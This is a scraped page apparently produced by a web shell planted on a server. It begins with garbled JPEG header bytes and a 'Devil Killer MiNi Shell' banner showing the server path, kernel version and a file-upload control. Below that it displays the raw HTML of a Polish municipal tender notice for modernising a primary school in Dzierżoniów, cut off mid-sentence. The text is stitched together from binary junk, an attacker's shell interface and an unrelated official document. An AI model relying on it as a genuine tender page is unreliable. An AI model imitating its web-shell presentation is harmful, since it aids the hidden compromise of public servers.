JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250512/0022644301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlanych obejmujących modernizację pomieszczeń Szkoły Podstawowej nr 9 przy ul. Kopernika 7, w ramach zadania pn.: „Modernizacja Szkoły Podstawowej nr 9 w Dzierżoniowie”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Dzierżoniów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890717830</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dzierżoniów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 746450882</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">jszymczak@um.dzierzoniow.pl, egarbera@um.dzierzoniow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://dzierzoniow.ezamawiajacy.pl/, https://bip.um.dzierzoniow.pl/, https://dzierzoniow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlanych obejmujących modernizację pomieszczeń Szkoły Podstawowej nr 9 przy ul. Kopernika 7, w ramach zadania pn.: „Modernizacja Szkoły Podstawowej nr 9 w Dzierżoniowie”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3d79eefd-d8ca-4924-ad61-584e12c091f3</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00226443</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00027839/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.15 Remont i modernizacja Szkoły Podstawowej nr 9 w Dzierżoniowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://dzierzoniow.ezamawiajacy.pl/pn/dzierzoniow/demand/210348/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://dzierzoniow.ezamawiajacy.pl/pn/dzierzoniow/demand/210348/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Niezbędne wymagania sprzętowo -<br/>aplikacyjne umożliwiające pracę na platformie zakupowej<br/>eZamawiajacy, tj.: Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512<br/>kb/s; Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej<br/>przeglądarki internetowej. Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS<br/>1.2.<br/>Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. Zamawiający<br/>określa informacje na temat kodowania i czasu odbioru danych tj.: Plik załączony przez Wykonawcę na<br/>Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania<br/>UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po<br/>upływie terminu otwarcia ofert. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz<br/>dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim<br/>źródłem czasu. Zamawiający określił dopuszczalne formaty przesyłanych danych w SWZ tj. plików o<br/>wielkości do 2 GB. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .rtf .xls .jpg<br/>(.jpeg) ze szczególnym wskazaniem na .pdf. W celu ewentualnej kompresji danych Zamawiający<br/>rekomenduje wykorzystanie jednego z formatów: .zip lub .7Z. Wymagania techniczne i organizacyjne<br/>sporządzania, wysyłania i odbierania korespondencji elektronicznej zostały opisane na Platformie w<br/>zakładce „Baza Wiedzy/Plany zamówień publicznych” pod adresem internetowym<br/>https://dzierzoniow.ezamawiajacy.pl/. Wszelką korespondencję związaną z postępowaniem, należy<br/>przekazywać za pośrednictwem Platformy. Korespondencję uważa się za przekazaną w terminie, jeżeli<br/>dotrze do Zamawiającego przed upływem wymaganego terminu. Każda ze stron na żądanie drugiej<br/>niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej.<br/>Oferta wraz z załącznikami musi zostać w ogólnie przyjętych formatach danych i<br/>złożona w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej<br/>podpisem osobistym albo podpisem zaufanym pod rygorem nieważności.<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów<br/>musi być zgodny z wymogami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz Rozporządzeniu Ministra<br/>Rozwoju, Pracy i Technologii z<br/>dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>informuję, że: Administratorem Danych jest Gmina Miejska<br/>Dzierżoniów reprezentowana przez Burmistrza Dzierżoniowa ul. Rynek 1, 58-200 Dzierżoniów tel. 74<br/>645 0800; Inspektor Ochrony Danych - Kontakt: Urząd Miasta w Dzierżoniowie, ul. Rynek 1, pok. 22<br/>tel. 74 645 0808, e-mail: inspektorodo@um.dzierzoniow.pl; Będziemy przetwarzać Twoje dane w celu przeprowadzenia zamówienia<br/>publicznego, a w przypadku wyboru najkorzystniejszej oferty w celu zawarcia i realizacji umowy, Będziemy przetwarzać Twoje dane na podstawie: 1. Art. 6 ust. 1 lit. c RODO, tj. przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na<br/>administratorze 2. Ustawy z dnia 11.09.2019r. Prawo zamówień publicznych wraz z aktami wykonawczymi do ustawy 3. Ustawy z<br/>dnia 27.08.2009r. o finansach publicznych. W przypadku wyboru<br/>najkorzystniejszej oferty również na podstawie art. 6 ust. 1 lit. b) RODO- tj. przetwarzanie jest<br/>niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą lub do podjęcia działań<br/>na żądanie osoby, której dane dotyczą przed zawarciem umowy; Twoje dane osobowe będą<br/>przechowywane przez okres wynikający z jednolitego rzeczowego wykazu akt lub przez okres<br/>trwałości<br/>projektu dofinansowanego ze źródeł zewnętrznych wynikający z odrębnych przepisów prawa;<br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp; Odbiorcy Twoich danych - Twoje dane osobowe w postaci nazwy/imienia i nazwiska oraz<br/>adresu prowadzenia działalności gospodarczej mogą zostać udostępnione:- w Biuletynie Zamówień<br/>Publicznych / w Dzienniku Urzędowym Unii Europejskiej,- na Platformie Zakupowej eZamawiający,-w<br/>Biuletynie Informacji Publicznej Urzędu Miasta w Dzierżoniowie,-wykonawcom biorącym udział w<br/>postępowaniu,-organom upoważnionym na mocy przepisów prawa,-wykonawcom świadczącym usługi<br/>na rzecz Zamawiającego, min. firma Market Planet Otwarty Rynek Elektroniczny S.A.-dostawca<br/>platformy zakupowej do obsługi zamówień publicznych.Ponadto po zawarciu umowy w/w dane mogą<br/>zostać udostępnione każdej osobie, która wystąpi z wnioskiem o ich udostępnienie w trybie dostępu do<br/>informacji publicznej (jeśli nie będą zachodziły przesłanki wyłączające); Twoje prawa związane z<br/>przetwarzaniem danych osobowych - Przysługują Ci, w sytuacjach określonych prawem, następujące<br/>prawa związane z przetwarzaniem danych osobowych:- na podstawie art. 15 RODO prawo dostępu do<br/>danych osobowych Pani/Pana dotyczących;- na podstawie art. 16 RODO prawo do sprostowania<br/>Pani/Pana danych osobowych ;- na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO ; - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;Nie przysługuje Ci:- w<br/>związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;- na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. Klauzula<br/>informacyjna stanowi załącznik nr 9 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZI-1.271.32.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia.<br/>1. Przedmiotem zamówienia jest robót budowlanych obejmujących modernizację pomieszczeń Szkoły Podstawowej nr 9, w ramach realizacji zadania inwestycyjnego pn.: „Modernizacja Szkoły Podstawowej nr 9 w Dzierżoniowie”. <br/>2. Zakres przedmiotu zamówienia dotyczy wykonania robót budowlanych w oparciu o posiadaną przez Zamawiającego dokumentację projektową dla II Etapu, która obejmuje (część gwarantowaną) w zakresie:<br/>1) przebudowy kuchni wraz z zapleczem socjalno-sanitarnym;<br/>2) dostawy i montażu urządzeń technologicznych kuchni i jej zaplecza;<br/>3) modernizacji korytarza, kiosku, pokoju intendenta i jadalni na parterze; modernizacji korytarza, sal lekcyjnych, pomieszczeń logopedy, pedagoga, psychologa na I piętrze; modernizacji korytarza <br/>i sal lekcyjnych na II piętrze; w zakresie robót wykończeniowych obejmujących wymianę posadzek wraz z podłożem, wykonanie tynków, gładzi, okładzin ściennych i robót malarskich. Zakres rzeczowy robót określonych w przedmiotowym punkcie nie dotyczy modernizacji pomieszczeń <br/>w piwnicy.<br/>4) demontażu i ponownego montażu 83 grzejników dla potrzeb wykonania robót, o których mowa w pkt. 3;<br/>5) przebudowy instalacji wodociągowej zewnętrznej i wewnętrznej;<br/>6) przebudowy instalacji wewnętrznej gazu dla potrzeb zasilania kuchni i demontaż instalacji gazowej w budynku głównym szkoły; <br/>oraz <br/>wykonanie robót budowlanych w oparciu o posiadaną przez Zamawiającego dokumentację projektową dla II Etapu, które obejmuje (część objętą prawem opcji) w szczególności:<br/>1) modernizację sali gimnastycznej wraz z zapleczem socjalno-sanitarnym; w zależności od rodzaju dostawy i montażu jednostek wentylacyjnych w sali gimnastycznej należy przewidzieć wykonanie <br/>i montaż ich zabezpieczenia, w postaci konstrukcji stalowej o zamkniętych profilach wypełnionych siatką, przed uderzeniem piłką;<br/>2) dostawę i montaż wyposażenia sportowego: zestaw do siatkówki, kosze składane i kosze stałe, drabinki gimnastyczne ścienne, tablica wyników;<br/>3) modernizację małej sali gimnastycznej;<br/>4) modernizację korytarza przy sali gimnastycznej;<br/>5) wykonanie otworu technologicznego w ścianie zewnętrznej łącznika do sali gimnastycznej <br/>w celu zapewnienia dojścia na teren budowy (sali gimnastycznej i pomieszczeń zaplecza), usunięcia gruzu z rozbiórki, dostawy materiałów budowlanych. Zakres robót w szczególności obejmuje wykonanie otworu w sposób najmniej inwazyjny, demontaż okna, demontaż<br/>i ponowny montaż instalacji c.o. wraz z grzejnikiem, montaż drzwi na czas budowy, ponowny montaż okna wraz z montażem nowych parapetów, zamurowanie otworu, uzupełnienie tynków <br/>i gładzi oraz uzupełnienie elewacji.	<br/>Roboty budowlane należy wykonać z uwzględnieniem likwidacji barier architektonicznych dla osób z niepełnosprawnościami oraz z zasadą nieczynienia szkody środowisku – DNSH. Podręcznik dotyczący stosowania zasady DNSH można znaleźć pod linkiem: https://funduszeuedolnoslaskie.pl/dokumenty/4453-program-fundusze-europejskie-dla-dolnego-slaska-2021-2027 .<br/>Dla potwierdzenia spełnienia powyższej zasady Wykonawca zobowiązany będzie na przykład do:<br/>1) przestrzegania obowiązujących przepisów dotyczących ochrony środowiska na etapie budowy;<br/>2) przedstawienia kart, świadectw deklaracji potwierdzających pochodzenie, jakość, bezpieczeństwo zastosowanych materiałów i urządzeń;<br/>3) prowadzenia segregacji odpadów;<br/>4) uporządkowania placu budowy po zakończeniu robót budowlanych;<br/>5) usunięcia powstałych w czasie wykonywania robót odpadów w sposób zgodny z zapisami ustawy z dnia 14 grudnia 2012 r. o odpadach;<br/>6) prowadzenia działań skutecznie zapobiegających emisji hałasu, kurzu i zanieczyszczeń;<br/>7) prowadzenia robót w wyznaczonych godzinach przez dyrektora szkoły;<br/>8) zorganizowania, utrzymania i rozbiórki terenu budowy;<br/>9) zabezpieczenia i ochrony terenu budowy.<br/>3. Szczegółowy zakres przedmiotu zamówienia w zakresie zamówienia został określony w:<br/>1) projekcie wykonawczym kuchni;<br/>1.1) projekcie technologicznym wraz ze specyfikacją materiałową urządzeń;<br/>1.2) projekcie wykonawczym – branża sanitarna;<br/>1.3) projekcie wykonawczym – branża elektryczna i teletechniczna;<br/>1.4) specyfikacje techniczne wykonania i odbioru robót budowlanych;<br/>2) projekcie wykonawczym – duża sala gimnastyczna;<br/>2.1) projekcie wykonawczym – branża architektoniczno-budowlana;<br/>2.2) projekcie wykonawczym – branża sanitarna;<br/>2.3) projekcie wykonawczym – branża elektryczna i teletechniczna;<br/>2.4) specyfikacji technicznej wykonania i odbioru robót budowlanych;<br/>2.5) rysunkiem ze wskazaniem lokalizacji otworu technologicznego;<br/>3) projekcie wykonawczym – mała sala gimnastyczna;<br/>3.1) ekspertyzie technicznej małej sali gimnastycznej;<br/>3.2 projekcie wykonawczym – branża sanitarna;<br/>3.3) projekcie wykonawczym – elektryczna i teletechniczna;<br/>4) projekcie wykonawczym – posadzki, tynki, malowanie, okleiny;<br/>4.1) specyfikacji technicznej wykonania i odbioru robót budowlanych;<br/>5) projekcie zagospodarowania terenu – przebudowa instalacji zewnętrznej i wewnętrznej wody;<br/>6) projekcie architektoniczno-budowlanym - przebudowa instalacji wewnętrznej gazu.<br/>4. Wykonawca zobowiązany jest do wykonania zakresu robót wskazanych w projekcie umowy,<br/>w dokumentacji projektowej, w tym projektach wykonawczych, który jest określony w formie opisu technicznego lub na rysunkach lub równocześnie w opisie i na rysunkach. Zarówno opis techniczny, jak i rysunki (część graficzna) projektów są równoważne i opisują przedmiot zamówienia.<br/>5. Wykonawca zobowiązany jest do wykonania robót budowlanych zgodnie ze sztuką budowlaną, zaleceniami nadzoru inwestorskiego, dokumentacją wymienioną w pkt 3 z uwzględnieniem likwidacji barier architektonicznych dla osób z niepełnosprawnościami.<br/>6. Zamawiający informuje, że w trakcie wykonywania robót budowlanych budynek szkoły będzie użytkowany, w związku z tym udostępnianie pomieszczeń takich jak korytarze czy klasy dla potrzeb realizacji robót będzie odbywało się etapami i będzie uzależnione od technologii wykonywania robót budowlanych i możliwości ich uwolnienia w danym momencie. <br/>7. Dla potrzeb realizacji robót w kuchni wraz z zapleczem socjalno-sanitarnym oraz robót <br/>w sali gimnastycznej wraz z zapleczem socjalno-sanitarnym, pomieszczenia te będą wyłączone <br/>z użytkowania. <br/>8. Roboty budowlane objęte zamówieniem będzie można wykonywać od poniedziałku do piątku <br/>w godzinach od 700 do 1800 oraz w soboty od 800 do 1500. Roboty generujące nadmierny hałas, należy wykonywać po godzinie 1400. W uzasadnionych przypadkach i za zgodą dyrektora szkoły czas ten może ulec zmianie.<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w SWZ i projekcie umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający obejmuje część zamówienia prawem opcji określonym w § 21 projektu umowy (załącznik nr 10 do SWZ). Zakres przedmiotu zamówienia w ramach zamówienia objętego prawem opcji (część objęta prawem opcji) obejmuje wykonanie robót budowlanych polegających na: <br/>1) modernizacji sali gimnastycznej wraz z zapleczem socjalno-sanitarnym; w zależności od rodzaju dostawy i montażu jednostek wentylacyjnych w sali gimnastycznej należy przewidzieć wykonanie <br/>i montaż ich zabezpieczenia, w postaci konstrukcji stalowej o zamkniętych profilach wypełnionych siatką, przed uderzeniem piłką;<br/>2) dostawę i montaż wyposażenia sportowego: zestaw do siatkówki, kosze składane i kosze stałe, drabinki gimnastyczne ścienne, tablica wyników;<br/>3) modernizacji małej sali gimnastycznej;<br/>4) modernizacji korytarza przy sali gimnastycznej;<br/>5) wykonaniu otworu technologicznego w ścianie zewnętrznej łącznika do sali gimnastycznej w celu zapewnienia dojścia na teren budowy (sali gimnastycznej i pozostałych pomieszczeń), usunięcia gruzu z rozbiórki, dostawy materiałów budowlanych. Zakres robót w szczególności obejmuje wykonanie otworu w sposób najmniej inwazyjny, demontaż okna, demontaż <br/>i ponowny montaż instalacji c.o. wraz z grzejnikiem, montaż drzwi na czas budowy, ponowny montaż okna wraz z montażem nowych parapetów, zamurowanie otworu, uzupełnienie tynków <br/>i gładzi oraz uzupełnienie elewacji.	<br/>Maksymalna wartość opcji wynosi: do 1 039 635,34 zł netto.<br/>Warunkiem wprowadzenia opcji jest uzyskanie dofinansowania na realizację robót objętych opcją. Zgodnie z paragrafem 21 projektu umowy Zamawiający przewiduje możliwość skorzystania w trakcie realizacji umowy, w terminie nie później niż do 6 miesięcy od dnia zawarcia umowy w sprawie zamówienia publicznego, z zamówienia objętego prawem opcji (część objęta prawem opcji). Warunkiem uruchomienia prawa opcji jest złożenie przez Zamawiającego oświadczenia woli o skorzystaniu z prawa opcji i jego zakresie w formie pisemnej. Uruchomienie opcji przez Zamawiającego jest uwarunkowane otrzymaniem dofinansowania przez Zamawiającego lub zabezpieczeniem dodatkowych środków finansowych w budżecie Gminy Miejskiej Dzierżoniów na wykonanie robót budowlanych objętych prawem opcji. Skorzystanie z prawa opcji nie jest obowiązkowe. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługuje żadne roszczenie z tego tytułu. Zamawiający zastrzega sobie możliwość realizacji zamówienia w ramach prawa opcji w niepełnym zakresie i zlecenia tylko jej części w zależności od potrzeb i posiadanych środków finansowych przez Zamawiającego.<br/>Realizacja prawa opcji będzie przebiegać w następujący sposób:<br/>1) Zamawiający poinformuje Wykonawcę w terminie, o którym mowa w § 3 ust. 2<br/> projektu 